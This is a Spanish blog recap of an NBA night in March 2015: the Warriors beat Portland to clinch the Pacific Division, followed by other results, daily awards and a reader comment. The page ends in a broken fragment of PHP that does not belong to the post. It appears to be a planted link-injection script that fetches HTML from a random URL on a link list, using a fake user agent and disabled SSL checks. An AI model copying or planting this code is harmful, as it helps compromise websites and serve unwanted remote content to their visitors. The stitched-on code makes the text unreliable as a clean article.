La Crónica: 39 años después

25 de March de 2015 por MagicJohnson32

Temporada 1975-1976. La NBA, que todavía no se ha fusionado con la ABA, la integran 18 equipos. Larry O’Brien se estrena como comisionado. Kareem Abdul Jabbar es traspasado de los Bucks a los Lakers, donde se alza con un nuevo MVP. Bob McAdoo, de los Buffalo Braves, es el máximo anotador de la temporada. Y los Golden State Warriors se proclaman campeones de la Pacific Division por última vez en su historia.

Hasta hoy.

curryblazers

Golden State Warriors 122 – Portland Trail Blazers 108

39 años después, los Warriors vuelven a hacerse con la Pacific, un título que no deja de ser honorífico pero sirve para reconocer el actual status de una franquicia que no se conformó con el papel de Cenicienta o con el ‘We Believe’. Y vaya si lo han logrado. Los de Oakland se presentan en la recta final de campaña como aspirantes al Anillo con todas las letras. Por eso, la victoria de anoche en el Moda Center y la consecución matemática del primer puesto de la Pacific no dio para grandes celebraciones. Tampoco encontraron un rival en su mejor momento, unos Blazers de nuevo castigados por las lesiones (ausentes LaMarcus, Batum y Kaman, además de Wes Matthews) que resistieron muy dignamente hasta el descanso. Con Lillard y McCollum como puntas de lanza, Portland llegó a acumular 12 puntos de ventaja. Pero, como viene siendo norma toda la temporada, Curry dio la impresión de ganar el partido cuando quiso, y un tercer cuarto demoledor dejó el encuentro sentenciado. Los Warriors suman 7 victorias seguidas y 12 en los últimos 13 partidos, cifras que contrastan con las 5 derrotas que han enlazado los Blazers, cuya ventaja en la Northwest sobre los Thunder se ha reducido a 4 partidos de diferencia.

Resto de la jornada

El Oeste vivió otra batalla directa entre equipos de Playoffs, la victoria de los Mavericks sobre San Antonio Spurs (94-101) que Carlisle definió en tres palabras: “Too much Monta”. La gran actuación de Ellis sirvió a Dallas para mantener las distancias con los Thunder, que no tuvieron problemas para vencer a los Lakers (117-127) con un Kanter estelar. Del papel de Jordan Clarkson hablaremos en la sección de premios. También encontraréis allí a DeMarcus Cousins, omnipresente en el ajustadísimo triunfo de los Kings sobre los Sixers (106-107). Más emoción si cabe hubo entre Heat y Bucks. El partido, que se presentaba fundamental para Milwaukee si no querían complicarse la vida y su presencia en Playoffs, se resolvió con un buzzer beater de Khris Middleton para ganar el partido (el segundo que logra esta campaña) en una jugada final de locura que podéis ver en el número 1 del Top 10 (o aquí). También hubo mucha igualdad entre Raptors y Pistons. Liderados por Reggie Jackson, Drummond y KCP, los de Detroit se impusieron (104-108) y vuelve a enlazar una racha victoriosa que alimenta las esperanzas de meterse en la pelea por la octava posición.

PREMIOS

MVP: No fue especialmente efectivo pero hay que premiar a Cousins por sus descomunales 33 puntos, 17 rebotes (10 de ellos ofensivos), 3 asistencias, 4 robos y 4 tapones.

Rookie: De largo lo mejor en la negrísima campaña de los Lakers, Jordan Clarkson se destapó ante Westbrook con 30 puntos, 4 rebotes, 7 asistencias, 1 robo y 3 tapones.

Sorpresa: Parece que Kentavious Caldwell-Pope empieza a enlazar grandes partidos. Anoche, 26 puntos (10 de 17 TC, 5 de 9 T3) con 6 rebotes y 4 asistencias. Si sigue así, dejará de ser sorpresa.

Decepción: Pese a ganar anoche, a los Bucks no le ha sentado nada bien el cambio de Brandon Knight por Michael Carter-Williams. El base firmó una pésima actuación anoche con más pérdidas y faltas (6) que cuanlquier otra estadística (4 puntos, 3 rebotes, 4 asistencias).

Mayor esfuerzo en vano: Reconozcamos aquí el completísimo partido de Nerlens Noel. 14 puntos, 10 rebotes, 3 asistencias y 6 tapones para el larguirucho pívot de los Sixers.

TOP 10

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. iker dice:
    #1

    sinceramente, un mvp de la jornada a demarcus por hacerle eso a los sixers me parece exagerado teniendo en cuenta que monta se fue a los 38 puntos y curry a los 33 puntos y 10 asistencias y ambos con buenos porcentajes.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>